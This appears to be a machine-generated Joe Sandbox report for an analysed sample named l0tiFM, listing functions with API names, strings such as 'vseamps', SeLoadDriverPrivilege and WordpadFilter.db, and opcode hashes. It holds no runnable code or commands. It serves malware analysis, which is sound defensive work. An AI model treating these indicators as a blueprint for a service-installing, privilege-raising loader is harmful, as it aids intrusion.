                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                                                • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                                                                • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                                                • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateReadmalloc
                                                                                                                • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                                                                • API String ID: 3950102678-3381721293
                                                                                                                • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                                                • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                                                                • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                                                • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 190073905-0
                                                                                                                • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                                                • Instruction ID: 200ba1eaccdb56bb8a39e9f9c3ebab91d682492d5e843a2ac4e892f0bbe45b50
                                                                                                                • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                                                • Instruction Fuzzy Hash: C58168B5E0834346FE54BF75D541A7B63A0AF45780F9C4036EA0E6F692DE2CF9498780

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                                                                • String ID: WordpadFilter.db
                                                                                                                • API String ID: 868324331-3647581008
                                                                                                                • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                                                • Instruction ID: efc89471d09b85c4e495e240cf211d7dcb704c5374d01f5d9737b1d73c5383d6
                                                                                                                • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                                                • Instruction Fuzzy Hash: 65318072B15B4189EB00EFB1D8406AE73B5EB98788F584635EE8D27B44EF38D555C380

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                                                • Instruction ID: b5c6679d8abf1cf11a429dd6e243c46acffadc3ab6381ad13ab9c944b6361c89
                                                                                                                • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                                                • Instruction Fuzzy Hash: 45816A76A1869246EA11AF35D8005BAA794FF56BC4F588335EF593B792DF3CF0928300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3526400053-0
                                                                                                                • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                                                • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                                                                • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                                                • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                                                                • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                                                                • API String ID: 3408796845-4213300970
                                                                                                                • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                                                • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                                                                • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                                                • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                                                                • String ID: ampStopSingletone: logging ended
                                                                                                                • API String ID: 2048888615-3533855269
                                                                                                                • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                                                • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                                                                • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                                                • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                                                • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                                                                • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                                                • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastManagerOpen$FileModuleName
                                                                                                                • String ID: /remove$/service$vseamps
                                                                                                                • API String ID: 67513587-3839141145
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                                                                • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                                                                • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                                                  • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Load$Library
                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                • API String ID: 3981747205-232180764
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284112124-0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                                                                • String ID: vseamps
                                                                                                                • API String ID: 3693165506-3944098904
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName
                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                • API String ID: 514040917-4022980321
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2057259594-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 3103264659-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3140674995-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269745586-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1239891234-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 1445889803-0
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                                                                • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1617791916-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2202868296-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 15204871-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharErrorLastMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 203985260-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: EntryFunctionLookup
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852435196-0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
